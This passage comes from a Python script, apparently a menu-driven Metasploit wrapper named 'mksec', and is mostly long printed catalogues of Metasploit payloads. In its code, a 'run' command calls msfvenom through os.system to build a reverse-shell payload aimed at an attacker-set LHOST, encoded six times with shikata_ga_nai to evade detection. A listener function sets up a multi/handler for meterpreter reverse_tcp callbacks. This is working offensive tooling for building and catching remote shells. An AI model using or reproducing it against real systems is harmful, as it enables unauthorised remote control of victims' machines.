newer. Connect back to the attacker (Windows x64)\nwindows/x64/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 winhttp)\nwindows/x64/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows x64 winhttp)\nwindows/x64/meterpreter_bind_named_pipe Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/peinject/bind_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for an IPv6 connection (Windows x64)\nwindows/x64/peinject/bind_ipv6_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/peinject/bind_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a pipe connection (Windows x64)\nwindows/x64/peinject/bind_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a connection(Windows x64)\nwindows/x64/peinject/bind_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker\nwindows/x64/peinject/bind_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a connectionwith UUID Support (Windows x64)\nwindows/x64/peinject/reverse_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker via a named pipe pivot\nwindows/x64/peinject/reverse_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker (Windows x64)\nwindows/x64/peinject/reverse_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker\nwindows/x64/peinject/reverse_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Windows x64)\nwindows/x64/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session\nwindows/x64/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session\nwindows/x64/shell/bind_ipv6_tcp Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)\nwindows/x64/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/shell/bind_named_pipe Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)\nwindows/x64/shell/bind_tcp Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)\nwindows/x64/shell/bind_tcp_rc4 Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\nwindows/x64/shell/bind_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)\nwindows/x64/shell/reverse_tcp Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)\nwindows/x64/shell/reverse_tcp_rc4 Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\nwindows/x64/shell/reverse_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)\nwindows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)\nwindows/x64/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)\nwindows/x64/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/vncinject/bind_named_pipe Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a pipe connection (Windows x64)\nwindows/x64/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)\nwindows/x64/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker\nwindows/x64/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)\nwindows/x64/vncinject/reverse_http Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/vncinject/reverse_https Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)\nwindows/x64/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker\nwindows/x64/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)\nwindows/x64/vncinject/reverse_winhttps Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)\n""")
elif "run" == uinput.lower():
os.system("sudo msfvenom -p " + payload.strip() + " LHOST=" + host.strip() + " LPORT=" + port.strip() + " -e x86/shikata_ga_nai -i 6 -f " + format.strip() + " -o " + output.strip())
elif "run -f" == uinput.lower():
os.system("cd /opt/metasploit-framework/ && sudo ./msfvenom -p " + payload.strip() + " LHOST=" + host.strip() + " LPORT=" + port.strip() + " -e x86/shikata_ga_nai -i 6 -f " + format.strip() + " -o " + output.strip())
def PayloadListener():
payload = " windows/meterpreter/reverse_tcp "
host = " <IP> "
port = " 4444 "
youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
ipv4 = os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[listener]\033[37m\x1b[0m ")
UserInputs(uinput+"exp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mPayload is a listening tool. Edited by mksec using the 'exploit/multi/handler' module in the Metasploit tool. \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mPayload dinleme aracıdır. Metasploit aracı içerisindeki 'exploit/multi/handler' modülünü kullanarak mksec tarafından düzenlenmiştir. \x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nPAYLOAD{} YES Type '--list payloads' or '-lp' to see payloads \x1b[32mDefault: windows/meterpreter/reverse_tcp\x1b[37m\nLHOST {} YES Your IP address = \x1b[32m{}\x1b[37m\nLPORT {} YES Type in port \x1b[32mDefault = 4444\x1b[37m".format(payload,host,ipv4,port))
elif "set payload" in uinput.lower():
payload = uinput
payload = payload.replace("set payload ","").replace("set PAYLOAD ","").replace("SET payload ","").replace("SET PAYLOAD ","").center(50)
elif "set lhost" in uinput.lower():
host = uinput
host = host.replace("set lhost ","").replace("set LHOST ","").replace("SET lhost ","").replace("SET LHOST ","").center(50)
elif "set lport" in uinput.lower():
port = uinput
port = port.replace("set lport ","").replace("set LPORT ","").replace("SET lport ","").replace("SET LPORT ","").center(50)
elif "--list payload" in uinput or "-lp" == uinput.lower():
print("""\x1b[1m\x1b[33mFramework Payloads (592 total)\x1b[37m\n\x1b[33m==================================================\x1b[37m\n\n\x1b[33mName\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m----\x1b[37m \x1b[33m-----------\x1b[37m\naix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\naix/ppc/shell_find_port Spawn a shell on an established connection\naix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)\naix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nandroid/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP\nandroid/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS\nandroid/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager\nandroid/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell\nandroid/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell\nandroid/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell\nandroid/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP\nandroid/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS\nandroid/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager\napple_ios/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\napple_ios/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell\napple_ios/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\napple_ios/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\napple_ios/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nbsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell\nbsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/vax/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x64/exec Execute an arbitrary command\nbsd/x64/shell_bind_ipv6_tcp Listen for a connection and spawn a command shell over IPv6\nbsd/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port\nbsd/x64/shell_bind_tcp_small Listen for a connection and spawn a command shell\nbsd/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6\nbsd/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x64/shell_reverse_tcp_small Connect back to attacker and spawn a command shell\nbsd/x86/exec Execute an arbitrary command\nbsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nbsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nbsd/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for a connection over IPv6\nbsd/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nbsd/x86/shell/find_tag Spawn a command shell (staged). Use an established connection\nbsd/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to the attacker over IPv6\nbsd/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nbsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nbsd/x86/shell_bind_tcp_ipv6 Listen for a connection and spawn a command shell over IPv6\nbsd/x86/shell_find_port Spawn a shell on an established connection\nbsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nbsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nbsd/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6\nbsdi/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nbsdi/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nbsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nbsdi/x86/shell_find_port Spawn a shell on an established connection\nbsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\ncmd/mainframe/apf_privesc_jcl (Elevate privileges for user. Adds SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using an unsecured/updateable APF authorized library (APFLIB) and updating the user's ACEE using this program/library. Note: This privesc only works with z/OS systems using RACF, no other ESM is supported.)\ncmd/mainframe/bind_shell_jcl Provide JCL which creates a bind shell This implmentation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\ncmd/mainframe/generic_jcl Provide JCL which can be used to submit a job to JES2 on z/OS which will exit and return 0. This can be used as a template for other JCL based payloads\ncmd/mainframe/reverse_shell_jcl Provide JCL which creates a reverse shell This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\ncmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWKcmd/unix/bind_busybox_telnetd Listen for a connection and spawn a command shell via BusyBox telnetdcmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)cmd/unix/bind_jjs Listen for a connection and spawn a command shell via jjs\ncmd/unix/bind_lua Listen for a connection and spawn a command shell via Lua\ncmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat\ncmd/unix/bind_nodejs Continually listen for a connection and spawn a command shell via nodejs\ncmd/unix/bind_perl Listen for a connection and spawn a command shell via perl\ncmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl\ncmd/unix/bind_r Continually listen for a connection and spawn a command shell via R\ncmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby\ncmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby\ncmd/unix/bind_socat_udp Creates an interactive shell via socat\ncmd/unix/bind_stub Listen for a connection and spawn a command shell (stub only, no payload)\ncmd/unix/bind_zsh Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.\ncmd/unix/generic Executes the supplied command\ncmd/unix/interact Interacts with a shell on an established socket connection\ncmd/unix/pingback_bind Accept a connection, send a UUID, then exit\ncmd/unix/pingback_reverse Creates a socket, send a UUID, then exit\ncmd/unix/reverse Creates an interactive shell through two inbound connections\ncmd/unix/reverse_awk Creates an interactive shell via GNU AWK\ncmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bashwithout the /dev/tcp feature.\ncmd/unix/reverse_bash_telnet_ssl Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.\ncmd/unix/reverse_bash_udp Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bashwithout the /dev/udp feature.\ncmd/unix/reverse_jjs Connect back and create a command shell via jjs\ncmd/unix/reverse_ksh Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn't usually installed by default.\ncmd/unix/reverse_lua Creates an interactive shell via Lua\ncmd/unix/reverse_ncat_ssl Creates an interactive shell via ncat, utilizing ssl mode\ncmd/unix/reverse_netcat Creates an interactive shell via netcat\ncmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat\ncmd/unix/reverse_nodejs Continually listen for a connection and spawn a command shell via nodejs\ncmd/unix/reverse_openssl Creates an interactive shell through two inbound connections\ncmd/unix/reverse_perl Creates an interactive shell via perl\ncmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL\ncmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL\ncmd/unix/reverse_python Connect back and create a command shell via Python\ncmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.\ncmd/unix/reverse_r Connect back and create a command shell via R\ncmd/unix/reverse_ruby Connect back and create a command shell via Ruby\ncmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL\ncmd/unix/reverse_socat_udp Creates an interactive shell via socat\ncmd/unix/reverse_ssh Connect back and create a command shell via SSH\ncmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option\ncmd/unix/reverse_stub Creates an interactive shell through an inbound connection (stub only, no payload)\ncmd/unix/reverse_tclsh Creates an interactive shell via Tclsh\ncmd/unix/reverse_zsh Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.\ncmd/windows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)\ncmd/windows/bind_lua Listen for a connection and spawn a command shell via Lua\ncmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)\ncmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)\ncmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby\ncmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.\ncmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it\ncmd/windows/generic Executes the supplied command\ncmd/windows/powershell_bind_tcp Interacts with a powershell session on an established socket connection\ncmd/windows/powershell_reverse_tcp Interacts with a powershell session on an established socket connection\ncmd/windows/reverse_lua Creates an interactive shell via Lua\ncmd/windows/reverse_perl Creates an interactive shell via perl\ncmd/windows/reverse_powershell Connect back and create a command shell via Powershell\ncmd/windows/reverse_ruby Connect back and create a command shell via Ruby\nfirefox/exec This module runs a shell command on the target OS without touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt.\nfirefox/shell_bind_tcp Creates an interactive shell via Javascript with access to Firefox's XPCOM API\nfirefox/shell_reverse_tcp Creates an interactive shell via Javascript with access to Firefox's XPCOM API\ngeneric/custom Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.\ngeneric/debug_trap Generate a debug trap in the target process\ngeneric/shell_bind_tcp Listen for a connection and spawn a command shell\ngeneric/shell_reverse_tcp Connect back to attacker and spawn a command shell\ngeneric/tight_loop Generate a tight loop in the target process\njava/jsp_shell_bind_tcp Listen for a connection and spawn a command shell\njava/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell\njava/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection\njava/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP\njava/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS\njava/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager\njava/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection\njava/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager\njava/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/aarch64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/aarch64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/aarch64/shell/reverse_tcp dup2 socket in x12, then execve. Connect back to the attacker\nlinux/aarch64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/armbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/armbe/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/armle/adduser Create a new user with UID 0\nlinux/armle/exec Execute an arbitrary command\nlinux/armle/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/armle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/armle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/armle/shell/bind_tcp dup2 socket in r12, then execve. Listen for a connection\nlinux/armle/shell/reverse_tcp dup2 socket in r12, then execve. Connect back to the attacker\nlinux/armle/shell_bind_tcp Connect to target and spawn a command shell\nlinux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/mips64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mips64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mips64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes.\nlinux/mipsbe/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/mipsbe/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsbe/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes or executing other payloads that rely on initial startup procedures.\nlinux/mipsbe/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/mipsbe/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/mipsle/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes as well as on targets with extremely limited buffer space.\nlinux/mipsle/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/mipsle/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/mipsle/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes.\nlinux/mipsle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/ppc/shell_find_port Spawn a shell on an established connection\nlinux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/ppc64/shell_find_port Spawn a shell on an established connection\nlinux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/ppc64le/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc64le/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppc64le/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/ppce500v2/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/exec Execute an arbitrary command or just a /bin/sh shell\nlinux/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x64/pingback_bind_tcp Accept a connection from attacker and report UUID (Linux x64)\nlinux/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Linux x64)\nlinux/x64/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nlinux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x64/shell_bind_ipv6_tcp Listen for an IPv6 connection and spawn a command shell\nlinux/x64/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/x64/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\nlinux/x64/shell_find_port Spawn a shell on an established connection\nlinux/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6\nlinux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/x86/adduser Create a new user with UID 0\nlinux/x86/chmod Runs chmod on specified file with specified mode\nlinux/x86/exec Execute an arbitrary command or just a /bin/sh shell\nlinux/x86/meterpreter/bind_ipv6_tcp Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)\nlinux/x86/meterpreter/bind_ipv6_tcp_uuid Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\nlinux/x86/meterpreter/bind_nonx_tcp Inject the mettle server payload (staged). Listen for a connection\nlinux/x86/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection (Linux x86)\nlinux/x86/meterpreter/bind_tcp_uuid Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)\nlinux/x86/meterpreter/find_tag Inject the mettle server payload (staged). Use an established connection\nlinux/x86/meterpreter/reverse_ipv6_tcp Inject the mettle server payload (staged). Connect back to attacker over IPv6\nlinux/x86/meterpreter/reverse_nonx_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker\nlinux/x86/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nlinux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nlinux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nlinux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file 